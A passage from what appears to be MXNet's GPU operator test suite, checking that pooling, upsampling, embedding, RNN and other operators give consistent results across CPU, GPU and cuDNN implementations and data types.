for pool_ctx in pool_op_list:
(pool_op, ctx_type) = pool_ctx.rsplit('_', 1)
expected_ctxs = ['cpu', 'gpu', 'cudnn']
if ctx_type not in expected_ctxs:
raise RuntimeError('Expected one of {}, saw {}.'.format(expected_ctxs, ctx_type))
ctx = mx.cpu(0) if ctx_type == 'cpu' else mx.gpu(0)
ctx_list.append({'ctx': ctx, 'pool_data': data, 'type_dict': {'pool_data': dtype}})
# start with pool args present in all cases
pool_op_args = {'kernel': kernel, 'pool_type': pool_type,
'pooling_convention' : pooling_convention, 'name' : 'pool'}
# add other args as needed
if global_pool:
pool_op_args['global_pool'] = True
else:
# Add pad and stride param if needed, plus randomly when it matches the default
if not is_default_pad(pad) or random_choice():
pool_op_args.update({'pad' : pad})
if not is_default_stride(stride) or random_choice():
pool_op_args.update({'stride' : stride})
expected_pool_ops = ['pool', 'pool_transposed', 'pool_v1']
if pool_op == 'pool_v1':
sym = mx.sym.Pooling_v1(**pool_op_args)
else:
pool_op_args.update({'p_value' : p_value, 'count_include_pad' : count_include_pad})
if ctx_type != 'cpu':
pool_op_args['cudnn_off'] = ctx_type == 'gpu'
if pool_op == 'pool':
# isolate pooling input from symbol input to test shared tensor optimizations
buffered_input = mx.sym.identity(name='pool')
sym = mx.sym.Pooling(buffered_input, **pool_op_args)
elif pool_op == 'pool_transposed':
ndim = len(data)
# NCW->NWC axes=(0,2,1) NCHW->NHWC axes=(0,2,3,1) NCDHW->NDHWC axes=(0,2,3,4,1);
axes = (0,) + tuple(range(2,ndim)) + (1,)
transposed = mx.sym.transpose(axes=axes, name='pool')
pooled = mx.sym.Pooling(data=transposed, layout=transposed_layout(ndim),
**pool_op_args)
# NWC->NCW axes=(0,2,1) NHWC->NCHW axes=(0,3,1,2) NDHWC->NCDHW axes=(0,4,1,2,3);
axes = (0, ndim-1) + tuple(range(1,ndim-1))
sym = mx.sym.transpose(data=pooled, axes=axes, name='pool')
else:
raise RuntimeError('Expected one of {}, saw {}.'.format(expected_pool_ops,
pool_op))
sym_list.append(sym)
check_consistency(sym_list, ctx_list, equal_nan=(not count_include_pad), tol=tol)
def test_pooling_dim(dim, pool_type, dtype, pool_op_list, p_value=2, count_include_pad=True,
tol=None):
if dim == '1D':
data = (3, 3, 10)
kernels = [(4,), (4,), (5,)]
pads = [(0,), (2,), (2,)]
strides = [(1,), (2,), (1,)]
elif dim == '2D_no_padding':
data = (3, 2, 20, 20)
kernels = [(3, 3), (4, 5)]
pads = [(0, 0), (0, 0)]
strides = [(1, 1), (2, 1)]
elif dim == '2D':
data = (2, 2, 20, 20)
kernels = [(3, 3), (3, 5), (4, 5), (4, 5)]
pads = [(0, 0), (1, 2), (0, 0), (2, 3)]
strides = [(1, 1), (1, 1), (2, 1), (1, 1)]
elif dim == '3D':
data = (2, 3, 20, 20, 20)
kernels = [(4, 5, 3), (4, 5, 3), (3, 5, 7)]
pads = [(0, 0, 0), (2, 3, 2), (1, 2, 3)]
strides = [(1, 1, 1), (2, 3, 1), (1, 1, 1)]
else:
raise RuntimeError('Unexpected pooling test class: {}.'.format(dim))
for kernel, pad, stride in zip(kernels, pads, strides):
for pooling_convention in ['valid', 'full']:
try:
test_pooling_versions_helper(pool_op_list=pool_op_list,
data=data, kernel=kernel, pad=pad, stride=stride,
pool_type=pool_type, pooling_convention=pooling_convention,
global_pool=False, p_value=p_value,
count_include_pad=count_include_pad, tol=tol, dtype=dtype)
except:
print('pool_op_list = {}'.format(pool_op_list))
print('kernel={}, pad={}, stride={}'.format(kernel, pad, stride))
print('pool_type={}, pooling_convention={}, global_pool=False'.format(pool_type,
pooling_convention))
print('p_value={}, count_include_pad={}, dtype={}'.format(p_value,
count_include_pad, dtype))
print('environ = \n{}'.format(os.environ))
raise
# Make sure kernel is ignored during global_pool by sometimes setting it to a crazy value
kernel = kernels[0]
if random_choice():
kernel = (300,) * len(kernel)
test_pooling_versions_helper(pool_op_list=pool_op_list,
data=data, kernel=kernel, pad=None, stride=None,
pool_type=pool_type, global_pool=True, p_value=p_value,
count_include_pad=count_include_pad, tol=tol, dtype=dtype)
# The various implementations of the standard pooling operator
std_pool_op_list = ['pool_cpu', 'pool_transposed_cpu',
'pool_gpu', 'pool_transposed_gpu',
'pool_cudnn', 'pool_transposed_cudnn']
# The implementations of the 'v1' pooling operator
v1_pool_op_list = ['pool_v1_cpu', 'pool_v1_gpu']
# For those cases when all implementations should match- the combined implementation list.
combo_pool_op_list = std_pool_op_list + v1_pool_op_list
for dtype in [np.float32, np.float64, np.float16]:
# Testing of the standard (not 'v1') pooling operator is universal across all
# data dimensions, implementations and layouts.
for dim in ['1D', '2D', '3D']:
test_pooling_dim(dim, 'max', dtype, std_pool_op_list)
test_pooling_dim(dim, 'avg', dtype, std_pool_op_list, count_include_pad=True)
test_pooling_dim(dim, 'avg', dtype, std_pool_op_list, count_include_pad=False)
test_pooling_dim(dim, 'sum', dtype, std_pool_op_list)
test_pooling_dim(dim, 'lp', dtype, std_pool_op_list, p_value=1)
test_pooling_dim(dim, 'lp', dtype, std_pool_op_list, p_value=2)
test_pooling_dim(dim, 'lp', dtype, std_pool_op_list, p_value=3)
# Testing of the 'v1' pooling operator is over its restricted support domain of
# 2D data only and not with the 'lp' pooling type. The 'v1' cpu and gpu versions are
# always tested against each other, and sometimes against the standard operator versions.
# The slightly different 'v1' definition prevents this in the following cases:
#
# 1. In max pooling, when multiple input values are the maximum in the input window,
# the 'v1' implementation backprops the gradient to all maxima, whereas the standard
# pooling operator backprops the gradient to the lowest-indexed maximum only.
# 2. In max pooling, the 'v1' operator pads with 0's and this value can become the
# maximum output value in the case of an all-negative input. The standard pooling
# operator effectively considers the padding to be the largest negative value, so
# only input values should appear in the output.
# 3. In avg pooling, the 'v1' operator divides the sum by the same window size factor,
# even at the edges, and so does not support count_include_pad = False.
# 4. The float16 'v1' pooling operator performs forward sums and averages in
# float16, whereas the std operators perform those calculations in float32, so
# greater float16 tolerances are needed when comparing across implementations.
# Double the float16 tol when comparing v1 and non-v1 implemenations, per note 4 above.
relaxed_tol = {np.dtype(np.float16): 2e-1,
np.dtype(np.float32): 1e-3,
np.dtype(np.float64): 1e-5,
np.dtype(np.uint8): 0,
np.dtype(np.int32): 0,
np.dtype(np.int64): 0}
# Exclude std implementations due to points 1 and 2 above.
test_pooling_dim('2D', 'max', dtype, v1_pool_op_list)
# The standard and 'v1' implementations match for this case.
test_pooling_dim('2D', 'avg', dtype, combo_pool_op_list, count_include_pad=True,
tol=relaxed_tol)
# Exclude std implementations due to point 3 above.
test_pooling_dim('2D', 'avg', dtype, v1_pool_op_list, count_include_pad=False)
# The standard and 'v1' implementations match for this case.
test_pooling_dim('2D', 'sum', dtype, combo_pool_op_list, tol=relaxed_tol)
# We can compare the standard and 'v1' max pooling implementations if we eliminate padding
# (see point 2 above) and use np.float64 data so that no two random input window values are
# likely to be the same (see point 1 above).
test_pooling_dim('2D_no_padding', 'max', np.float64, combo_pool_op_list)
@with_seed()
def test_pooling_full_2d():
def test_pooling_full_2d_type(pool_type):
data = (2, 2, 10, 10)
kernel = (4, 5)
pad = (1, 2)
stride = (3, 4)
convention = 'full'
ctx_list = []
sym_list = []
# o_h = ceil((10 + 1 + 1 - 4) / 3) + 1 = 4
# o_w = ceil((10 + 2 + 2 - 5) / 4) + 1 = 4
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=convention, global_pool=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=convention, global_pool=False, name='pool'))
check_consistency(sym_list, ctx_list)
test_pooling_full_2d_type('max')
test_pooling_full_2d_type('avg')
test_pooling_full_2d_type('sum')
@with_seed()
def test_flatten_slice_after_conv():
ctx_list = []
data = mx.sym.Variable('conv_data')
conv = mx.symbol.Convolution(data=data, name='conv', num_filter=16, kernel=(3,3), stride=(1,1))
flatten = mx.symbol.flatten(data=conv)
slice_sym = mx.symbol.slice(data=flatten, begin=0, end=1)
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 16, 16, 16), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.cpu(0), 'conv_data': (2, 16, 16, 16), 'type_dict': {'conv_data': np.float32}}]
check_consistency(slice_sym, ctx_list)
@with_seed()
def test_bilinear_resize_op():
ctx_list = [{'ctx': mx.cpu(0), 'data': (2, 2, 20, 20), 'type_dict': {'data': np.float32}},
{'ctx': mx.gpu(0), 'data': (2, 2, 20, 20), 'type_dict': {'data': np.float32}}]
data = mx.sym.Variable('data')
sym = mx.sym.contrib.BilinearResize2D(data, height=10, width=5)
check_consistency(sym, ctx_list)
sym = mx.sym.contrib.BilinearResize2D(data, None, scale_height=2, scale_width=0.5, mode='odd_scale')
check_consistency(sym, ctx_list)
sym = mx.sym.contrib.BilinearResize2D(data, None, scale_height=0.5, scale_width=2, mode='to_even_up')
check_consistency(sym, ctx_list)
@with_seed()
def test_global_pooling():
def test_1d_pooling(pool_type, p_value=2):
data = (2, 3, 20)
kernel = (4,)
pad = (2,)
stride = (2,)
ctx_list = []
sym_list = []
pooling_convention = 'valid'
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool', p_value=p_value))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool', p_value=p_value))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool', p_value=p_value))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool'))
check_consistency(sym_list, ctx_list)
def test_2d_pooling(pool_type, p_value=2):
data = (2, 3, 20, 20)
kernel = (4, 4)
pad = (2, 2)
stride = (2, 2)
ctx_list = []
sym_list = []
pooling_convention = 'valid'
if pool_type != 'lp':
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling_v1(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling_v1(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling_v1(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool'))
check_consistency(sym_list, ctx_list)
test_1d_pooling('max')
test_1d_pooling('avg')
test_1d_pooling('sum')
test_1d_pooling('lp', p_value=1)
test_1d_pooling('lp', p_value=2)
test_1d_pooling('lp', p_value=3)
test_2d_pooling('max')
test_2d_pooling('avg')
test_2d_pooling('sum')
test_2d_pooling('lp', p_value=1)
test_2d_pooling('lp', p_value=2)
test_2d_pooling('lp', p_value=3)
@with_seed()
def test_upsampling_with_type():
sym = mx.sym.UpSampling(scale=2, num_filter=2, name='up', sample_type='nearest', num_args=1)
ctx_list = [{'ctx': mx.gpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float64}},
{'ctx': mx.gpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float32}},
{'ctx': mx.gpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float16}},
{'ctx': mx.cpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float64}},
{'ctx': mx.cpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_upsampling_bilinear_with_type():
sym = mx.sym.UpSampling(scale=2, num_filter=2, name='up', sample_type='bilinear', num_args=1)
ctx_list = [{'ctx': mx.gpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float64}},
{'ctx': mx.gpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float32}},
{'ctx': mx.gpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float16}},
{'ctx': mx.cpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float64}},
{'ctx': mx.cpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_concat_with_type():
sym = mx.sym.Concat(name='concat', num_args=2)
ctx_list = [{'ctx': mx.gpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
'type_dict': {'concat_arg0': np.float64, 'concat_arg1': np.float64}},
{'ctx': mx.gpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
'type_dict': {'concat_arg0': np.float32, 'concat_arg1': np.float32}},
{'ctx': mx.gpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
'type_dict': {'concat_arg0': np.float16, 'concat_arg1': np.float16}},
{'ctx': mx.cpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
'type_dict': {'concat_arg0': np.float64, 'concat_arg1': np.float64}},
{'ctx': mx.cpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
'type_dict': {'concat_arg0': np.float32, 'concat_arg1': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_elementwisesum_with_type():
dev_types = [[mx.gpu(0), [np.float64, np.float32, np.float16]],
[mx.cpu(0), [np.float64, np.float32]] ]
for num_args in range(1, 6):
ews_arg_shape = {}
for i in range(num_args):
ews_arg_shape['ews_arg'+str(i)] = (2, 10)
sym = mx.sym.ElementWiseSum(name='ews', num_args=num_args)
ctx_list = []
for dev, types in dev_types:
for dtype in types:
ews_arg_dtype = {'type_dict':{}}
for i in range(num_args):
ews_arg_dtype['type_dict']['ews_arg'+str(i)] = dtype
ctx_elem = {'ctx': dev}
ctx_elem.update(ews_arg_shape)
ctx_elem.update(ews_arg_dtype)
ctx_list.append(ctx_elem)
check_consistency(sym, ctx_list)
@with_seed()
def test_reshape_with_type():
sym = mx.sym.Reshape(name='reshape', shape=(-1,1,1,0))
ctx_list = [{'ctx': mx.gpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float64}},
{'ctx': mx.gpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float32}},
{'ctx': mx.gpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float16}},
{'ctx': mx.cpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float64}},
{'ctx': mx.cpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_blockgrad_with_type():
sym = mx.sym.BlockGrad(name='bg')
ctx_list = [{'ctx': mx.gpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float64}},
{'ctx': mx.gpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float32}},
{'ctx': mx.gpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float16}},
{'ctx': mx.cpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float64}},
{'ctx': mx.cpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_swapaxis_with_type():
sym = mx.sym.SwapAxis(name='swap', dim1=1)
ctx_list = [{'ctx': mx.gpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float64}},
{'ctx': mx.gpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float32}},
{'ctx': mx.gpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float16}},
{'ctx': mx.cpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float64}},
{'ctx': mx.cpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_fullyconnected_with_type():
sym = mx.sym.FullyConnected(num_hidden=3, name='inner')
ctx_list = [{'ctx': mx.gpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float64}},
{'ctx': mx.gpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float32}},
{'ctx': mx.gpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float16}},
{'ctx': mx.cpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float64}},
{'ctx': mx.cpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float32}}]
check_consistency(sym, ctx_list)
# Sizes are divisible by 8 to test TensorCore on Volta GPU.
sym = mx.sym.FullyConnected(num_hidden=8, name='inner')
ctx_list = [{'ctx': mx.gpu(0), 'inner_data': (16, 24), 'type_dict': {'inner_data': np.float16}},
{'ctx': mx.cpu(0), 'inner_data': (16, 24), 'type_dict': {'inner_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_activation_with_type():
act_types = ['relu', 'sigmoid', 'tanh', 'softrelu', 'softsign']
shape = (2, 2, 10, 10)
for act_type in act_types:
sym = mx.sym.Activation(name='act', act_type=act_type)
ctx_list = [{'ctx': mx.gpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float64}},
{'ctx': mx.gpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float32}},
{'ctx': mx.gpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float16}},
{'ctx': mx.cpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float64}},
{'ctx': mx.cpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float32}},
{'ctx': mx.cpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float16}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_lrn():
sym = mx.sym.LRN(alpha=0.0001, beta=0.75, knorm=2, nsize=5, name='lrn')
ctx_list = [{'ctx': mx.gpu(0), 'lrn_data': (2, 6, 10, 10), 'type_dict': {'lrn_data': np.float32}},
{'ctx': mx.cpu(0), 'lrn_data': (2, 6, 10, 10), 'type_dict': {'lrn_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_embedding_with_type():
def test_embedding_helper(data_types, weight_types, low_pad, high_pad):
NVD = [[20, 10, 20], [200, 10, 300]]
for N, V, D in NVD:
sym = mx.sym.Embedding(name='embedding', input_dim=V, output_dim=D)
ctx_list = []
for data_type in data_types:
for weight_type in weight_types:
ctx_list.append({'ctx': mx.gpu(0), 'embedding_data': (N,),
'type_dict': {'embedding_data': data_type, 'embedding_weight': weight_type}})
ctx_list.append({'ctx': mx.cpu(0), 'embedding_data': (N,),
'type_dict': {'embedding_data': data_type, 'embedding_weight': weight_type}})
arg_params = {'embedding_data': np.random.randint(low=-low_pad, high=V+high_pad, size=(N,))}
check_consistency(sym, ctx_list, grad_req={'embedding_data': 'null','embedding_weight': 'write'},
arg_params=arg_params)
data_types = [np.float16, np.float32, np.float64, np.int32]
weight_types = [np.float16, np.float32, np.float64]
test_embedding_helper(data_types, weight_types, 5, 5)
data_types = [np.uint8]
weight_types = [np.float16, np.float32, np.float64]
test_embedding_helper(data_types, weight_types, 0, 5)
@with_seed()
def test_svmoutput_with_type():
sym = mx.sym.SVMOutput(name='svmoutput', use_linear=True)
ctx_list = [{'ctx': mx.gpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float64}},
{'ctx': mx.gpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float32}},
{'ctx': mx.gpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float16}},
{'ctx': mx.cpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float64}},
{'ctx': mx.cpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float32}},
{'ctx': mx.cpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float16}}]
check_consistency(sym, ctx_list, use_uniform=True)
@with_seed()
def test_take_with_type():
sym = mx.sym.take(name='take')
for data_ndim in range(2, 5):
for idx_ndim in range(1, 4):
data_shape = ()
for _ in range(data_ndim):
data_shape += (np.random.randint(low=3, high=6), )
idx_shape = ()
for _ in range(idx_ndim):
idx_shape += (np.random.randint(low=3, high=5), )
ctx_list = [{'ctx': mx.gpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float64,
'take_a': np.float64}},
{'ctx': mx.gpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float32,
'take_a': np.float32}},
{'ctx': mx.gpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float16,
'take_a': np.float16}},
{'ctx': mx.cpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float64,
'take_a': np.float64}},
{'ctx': mx.cpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float32,
'take_a': np.float32}},
{'ctx': mx.cpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float16,
'take_a': np.float16}}]
arg_params = {'take_indices': np.random.randint(low=0,
high=data_shape[0],
size=idx_shape),
'take_a': np.random.normal(size=data_shape)}
check_consistency(sym, ctx_list,
grad_req={'take_indices': 'null',
'take_a': 'write'},
arg_params=arg_params)
def check_rnn_consistency(cell1, cell2):
dshape = (32, 5, 200)
data = mx.sym.Variable('data')
sym1, _ = cell1.unroll(5, data, merge_outputs=True)
mod1 = mx.mod.Module(sym1, label_names=None, context=mx.gpu(0))
mod1.bind(data_shapes=[('data', dshape)], label_shapes=None)
sym2, _ = cell2.unroll(5, data, merge_outputs=True)
mod2 = mx.mod.Module(sym2, label_names=None, context=mx.gpu(0))
mod2.bind(data_shapes=[('data', dshape)], label_shapes=None)
mod1.init_params()
args, auxs = mod1.get_params()
args = cell1.unpack_weights(args)
args = cell2.pack_weights(args)
mod2.set_params(args, auxs)
batch=mx.io.DataBatch(data=[mx.random.uniform(shape=dshape)], label=[])
mod1.forward(batch, is_train=False)
mod2.forward(batch, is_train=False)
assert_allclose(mod1.get_outputs()[0].asnumpy(), mod2.get_outputs()[0].asnumpy(), rtol=1e-2, atol=1e-4)
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_rnn():
fused = mx.rnn.FusedRNNCell(100, num_layers=2, mode='rnn_relu', prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.RNNCell(100, activation='relu', prefix='l0_'))
stack.add(mx.rnn.RNNCell(100, activation='relu', prefix='l1_'))
check_rnn_consistency(fused, stack)
check_rnn_consistency(stack, fused)
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_lstm_forget_bias():
forget_bias = 2.0
fused = mx.rnn.FusedRNNCell(10, forget_bias=forget_bias, num_layers=2, mode='lstm', prefix='')
dshape = (32, 1, 20)
data = mx.sym.Variable('data')
sym, _ = fused.unroll(1, data, merge_outputs=True)
mod = mx.mod.Module(sym, label_names=None, context=mx.gpu(0))
mod.bind(data_shapes=[('data', dshape)], label_shapes=None)
mod.init_params()
args, auxs = mod.get_params()
args = fused.unpack_weights(args)
bias_name = next(x for x in args if x.endswith('f_bias'))
expected_bias = forget_bias * np.ones(10, )
assert_allclose(args[bias_name].asnumpy(), expected_bias)
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_gru():
fused = mx.rnn.FusedRNNCell(100, num_layers=2, mode='gru', prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.GRUCell(100, prefix='l0_'))
stack.add(mx.rnn.GRUCell(100, prefix='l1_'))
check_rnn_consistency(fused, stack)
check_rnn_consistency(stack, fused)
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_bidirectional():
fused = mx.rnn.FusedRNNCell(100, num_layers=2, mode='gru', prefix='',
bidirectional=True)
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.GRUCell(100, prefix='l0_'),
mx.rnn.GRUCell(100, prefix='r0_'),
output_prefix='bi_gru_0_'))
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.GRUCell(100, prefix='l1_'),
mx.rnn.GRUCell(100, prefix='r1_'),
output_prefix='bi_gru_1_'))
check_rnn_consistency(fused, stack)
check_rnn_consistency(stack, fused)
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_unfuse():
for mode in ['rnn_tanh', 'rnn_relu', 'lstm', 'gru']:
fused = mx.rnn.FusedRNNCell(
100, num_layers=2, mode=mode,
prefix='test_%s'%mode,
bidirectional=True,
dropout=0.5)
stack = fused.unfuse()
check_rnn_consistency(fused, stack)
check_rnn_consistency(stack, fused)
@with_seed()
def test_psroipooling_with_type():
arg_params = {
'psroipool_rois': np.array([[0, 10, 22, 161, 173], [0, 20, 15, 154, 160]])}
# plain psroipooling
